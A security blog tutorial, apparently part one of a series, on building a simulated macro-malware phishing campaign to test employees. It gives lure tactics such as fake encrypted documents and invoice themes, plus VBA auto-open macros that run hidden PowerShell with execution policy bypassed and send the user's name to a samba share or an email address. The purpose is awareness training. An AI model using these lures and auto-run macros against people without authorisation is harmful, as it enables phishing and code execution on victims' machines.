So in our intro to macro malware blog we covered how macro malware is on the rise, is almost impossible to prevent and the only way many enterprise environments can harden against it is to educate their users into not opening those malicious emails. In this blog, and the subsequent parts, I want to walk through creating a harmless macro malware campaign that will provide you with everything you need to test your users (apart from the authorisation of course, make sure you get that first!).
Some would argue that a simple phishing campaign, which can be automated through many different tools, is easier and more reliable and they of course would be right so why bother with this at all? Well, I am a firm believer in getting any education pieces as close to real world as possible. Sure you can assume that if a user is open to clicking a link in an email then they may be equally likely to open an attached document but would they harmlessly preview it or would they go one step further and open it fully. Even then, would they enable the macro? (Hopefully not if they are aware of what that simple “enable content” button can do!
So where do we start?
NOTE: We will be using PowerShell for our dummy malware so this won’t work on XP users!
What sets your campaign apart from that of the bad guys is you probably don’t want to alarm or distress your users where as the bad guys are more than happy to send emails full of emotion triggering content such as pay cuts, redundancies looming etc. Of course your authorisation may allow you to send out a bulk email informing users they are losing pension rights but chances are you won’t. I have had some success with emails about outdated invoices and new discount schemes but please feel free to put some of your ideas in the comments. Whatever you choose remember that the end game is not simply to get the recipient to open the email or the document. The aim of the game is to get the recipient to enable macros!
The other important thing to note is that if you have a lot of users you are going to need some variety. Sending the same email to 20 people in the same office will definitely reduce the success rate so create a few different ones and stagger the send rate.
Finally, how do we receive feedback when people run the macro? My two go to solutions are either via a globally accessible samba location (\\filestore\share) or through an email. The dummy malware we will use here will be PowerShell based so you can do whatever your imagination comes up with.
Creating the documents
Okay, so you have an idea and now we need to produce the macro enabled document to send to some users. Macros are available in most Microsoft Office products but for the greatest chance of success I would stick with Microsoft Word, Excel or Powerpoint and choose the most appropriate dependant on your story. A common tactic of criminals is to (in some way) obscure the content of the document and then provide a message to inform the user that enabling macros will reveal the content, generally because of some form of cryptography. The benefit of this tactic is that you can use quite a generic document for different background stories.
As an example, here is a snip of a quick document I made that tries to encourage users to decrypt it by enabling macros. As you can see its very simple, with the sole purpose of trying to get the user to enable those macros.
Again the bad guys have the advantage here as they are more than happy to leverage the trust that comes with bank and other corporate logos where as you may be more hesitant even if the campaign is purely internal.
The image below is from Excel, showing a similar tactic.
Embed the macro
Now we need to generate the macro itself and attach it to the document. The name of the macro will change dependant on the Microsoft product:
- Microsoft Word : AutoOpen()
- Microsoft Excel or PowerPoint: Auto_Open()
From Office 2010 onwards, you will find the Macro button on the view tab on the far right. Clicking it will pop out a window where you can create a new macro. Enter the name for your macro (dependant on the product) and make sure to select the document in the drop down menu “Macros in” (will have the same name as in the title bar). You should now enter the VBA application.
We will be putting our “malicious” macro code between the first and last lines here.
A single quote denotes a comment here, so they can all be removed.
If you’ve read the intro to macro malware article then you will already know we can put some scary stuff here but we able to use some easier to read code here. We will basically define a little PowerShell code and then call it through a shell call.
Some basic options then:
1. Write the date to a file named after the user
Here we will use a samba share defined in the outputFilePath to store a file that will generated when the macro runs, named with the users name and containing the date and time the user clicked the macro.
outputFilePath = "\\sambaServer\sambaShare\$env:username" ' PowerShell_Script = "echo (get-date) >> " & outputFilePath x = Shell("powershell -ExecutionPolicy Bypass -NonInteractive -NoLogo -NoProfile -Command " & PowerShell_Script & "", 0)
2. Send an email with the users name
If you don’t have a samba server to use but do have an open email relay, then you can use the following code to send an email to a designated address instead.
smtpServer = "220.127.116.11" toEmailAddress = "[email protected]" fromEmailAddress = "[email protected]" ' PowerShell_Script = "send-mailmessage -from " & fromEmailAddress & " -To " & toEmailAddress & " -Subject 'Macro Malware' -Body $env:username -SMTPServer " & smtpServer x = Shell("powershell -ExecutionPolicy Bypass -NonInteractive -NoLogo -NoProfile -Command " & PowerShell_Script & "", 0)
So that’s the macro created and embedded. Give it a test a few times to see the output. It should look a lot like the screen below if you are using Microsoft Word.
In part II we will cover creating the email and sending it via an SMTP relay. We will again turn to PowerShell for this to craft the email before sending it via SMTP.